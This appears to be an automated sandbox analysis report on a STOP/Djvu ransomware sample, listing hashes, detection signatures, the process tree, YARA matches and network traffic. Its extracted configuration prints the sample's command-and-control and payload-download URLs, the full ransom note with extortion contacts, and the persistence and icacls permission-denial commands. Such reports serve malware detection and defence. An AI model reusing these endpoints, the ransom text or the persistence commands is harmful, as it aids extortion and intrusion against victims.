Windows Analysis Report
mU2p71KMss.exe

Overview

General Information

Sample name: mU2p71KMss.exe (renamed because original name is a hash value)
Original sample name: e9ff14a975f084f01373d468c0b91a16.exe
Analysis ID: 1431118
MD5: e9ff14a975f084f01373d468c0b91a16
SHA1: 302d4b9f88ae7b085b56661774d6805156039924
SHA256: f6a6765642f0f8c4b81f45d4e1a9f65505432bbf4c249fa3c96b82d9c712effe
Tags: exe, Stop

Detection

Babuk, Djvu
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • mU2p71KMss.exe (PID: 348 cmdline: "C:\Users\user\Desktop\mU2p71KMss.exe" MD5: E9FF14A975F084F01373D468C0B91A16)
    • mU2p71KMss.exe (PID: 2716 cmdline: "C:\Users\user\Desktop\mU2p71KMss.exe" MD5: E9FF14A975F084F01373D468C0B91A16)
      • icacls.exe (PID: 1308 cmdline: icacls "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • mU2p71KMss.exe (PID: 1896 cmdline: "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask MD5: E9FF14A975F084F01373D468C0B91A16)
        • mU2p71KMss.exe (PID: 5968 cmdline: "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask MD5: E9FF14A975F084F01373D468C0B91A16)
  • mU2p71KMss.exe (PID: 2828 cmdline: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task MD5: E9FF14A975F084F01373D468C0B91A16)
    • mU2p71KMss.exe (PID: 2164 cmdline: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task MD5: E9FF14A975F084F01373D468C0B91A16)
  • mU2p71KMss.exe (PID: 5524 cmdline: "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart MD5: E9FF14A975F084F01373D468C0B91A16)
    • mU2p71KMss.exe (PID: 4748 cmdline: "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart MD5: E9FF14A975F084F01373D468C0B91A16)
  • mU2p71KMss.exe (PID: 4144 cmdline: "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart MD5: E9FF14A975F084F01373D468C0B91A16)
    • mU2p71KMss.exe (PID: 2616 cmdline: "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart MD5: E9FF14A975F084F01373D468C0B91A16)
Name: Babuk
Description: Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time as well. It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name: STOP, Djvu
Description: STOP Djvu Ransomware is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stop
{"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test2/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0864PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", 
"C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw0Ftq9GtunuzQZHGiqoG\\\\n8S4cMO\\/Bdgsd+jTtFbVs1bX4OXiYKnMXg4LclKMEHJ2gnP2X09BkzA29UJQlagak\\\\nuAL7j7iRagKeU4tAB8w9rziBYoa9zROqer7J6pf5B11vAvvRq4b3127kAxnMhpgo\\\\ns7MQC7pXIvTkEeGySeG+F5fjSMPUoF1\\/cAg6GuSWOPXoPvXKRA\\/mo+xyHVOKZe2+\\\\nSCpbMHAyMe7o4w\\/i\\/pVjv9g8pRDJtz14qtMuAR38ek+SPJ4PJCxA9e0tOi+p4yNn\\\\nvnFKoL5OwzoF+bvVHnTA7tk4fXB3AyaL9llS0kxEWS7x\\/kNYQyJPh9fimryM03Cy\\\\n1wIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xffe88:$x1: C:\SystemID\PersonalID.txt
    • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0x1002ec:$s1: " --AutoStart
    • 0x100300:$s1: " --AutoStart
    • 0x103f48:$s2: --ForNetRes
    • 0x103f10:$s3: --Admin
    • 0x104390:$s4: %username%
    • 0x1044b4:$s5: ?pid=
    • 0x1044c0:$s6: &first=true
    • 0x1044d8:$s6: &first=false
    • 0x1003f4:$s7: delself.bat
    • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
    00000006.00000002.2025120505.0000000004431000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      SourceRuleDescriptionAuthorStrings
      13.2.mU2p71KMss.exe.400000.0.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        13.2.mU2p71KMss.exe.400000.0.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        13.2.mU2p71KMss.exe.400000.0.raw.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
        • 0xffe88:$x1: C:\SystemID\PersonalID.txt
        • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
        • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
        • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
        • 0x1002ec:$s1: " --AutoStart
        • 0x100300:$s1: " --AutoStart
        • 0x103f48:$s2: --ForNetRes
        • 0x103f10:$s3: --Admin
        • 0x104390:$s4: %username%
        • 0x1044b4:$s5: ?pid=
        • 0x1044c0:$s6: &first=true
        • 0x1044d8:$s6: &first=false
        • 0x1003f4:$s7: delself.bat
        • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
        • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
        5.2.mU2p71KMss.exe.400000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          5.2.mU2p71KMss.exe.400000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF

          System Summary

          Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\mU2p71KMss.exe, ProcessId: 2716, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
          Timestamp:04/24/24-15:57:00.032327
          SID:2833438
          Source Port:49707
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/24/24-15:57:01.094676
          SID:2036335
          Source Port:80
          Destination Port:49707
          Protocol:TCP
          Classtype:A Network Trojan was detected

          AV Detection

          Source: mU2p71KMss.exeAvira: detected
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeAvira: detection malicious, Label: HEUR/AGEN.1313019
          Source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Djvu
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeReversingLabs: Detection: 44%
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeJoe Sandbox ML: detected
          Source: mU2p71KMss.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,1_2_0040E870
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040EA51 CryptDestroyHash,CryptReleaseContext,1_2_0040EA51
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,1_2_0040EAA0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040EC68 CryptDestroyHash,CryptReleaseContext,1_2_0040EC68
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,1_2_00410FC0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00411178 CryptDestroyHash,CryptReleaseContext,1_2_00411178
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,5_2_0040E870
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040EA51 CryptDestroyHash,CryptReleaseContext,5_2_0040EA51
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,5_2_0040EAA0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040EC68 CryptDestroyHash,CryptReleaseContext,5_2_0040EC68
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,5_2_00410FC0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00411178 CryptDestroyHash,CryptReleaseContext,5_2_00411178
          Source: mU2p71KMss.exe, 00000007.00000002.3243271467.00000000007A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_8361a420-5

          Compliance

          Source: C:\Users\user\Desktop\mU2p71KMss.exeUnpacked PE file: 1.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\mU2p71KMss.exeUnpacked PE file: 5.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 7.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 10.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 13.2.mU2p71KMss.exe.400000.0.unpack
          Source: mU2p71KMss.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile created: C:\_README.txt
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile created: C:\Users\user\_README.txt
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: mU2p71KMss.exe, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: CC:\poviwodi\xik\bihunow44-jeholo43\bikeyomipacase\kagakawotenot.pdb source: mU2p71KMss.exe, mU2p71KMss.exe.1.dr
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: mU2p71KMss.exe, 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\poviwodi\xik\bihunow44-jeholo43\bikeyomipacase\kagakawotenot.pdb source: mU2p71KMss.exe, mU2p71KMss.exe.1.dr
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,1_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,1_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,1_2_0040FB98
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,5_2_0040FB98

          Networking

          Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.5:49707 -> 62.150.232.50:80
          Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 62.150.232.50:80 -> 192.168.2.5:49707
          Source: Malware configuration extractorURLs: http://cajgtus.com/test2/get.php
          Source: Joe Sandbox ViewIP Address: 104.21.65.24 104.21.65.24
          Source: Joe Sandbox ViewASN Name: QNETKuwaitKW QNETKuwaitKW
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_0040CF10
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
          Source: mU2p71KMss.exe, 00000007.00000003.2095073426.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: mU2p71KMss.exe, 00000007.00000003.2095368781.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: mU2p71KMss.exe, 00000007.00000003.2095490468.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
          Source: global trafficDNS traffic detected: DNS query: cajgtus.com
          Source: mU2p71KMss.exe, 00000007.00000003.2036506866.000000000075F000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test2/get.php
          Source: mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000754000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.00000000006C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54
          Source: mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test2/get.phprk
          Source: mU2p71KMss.exe, 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
          Source: mU2p71KMss.exe, 00000007.00000003.2094960142.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095130817.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
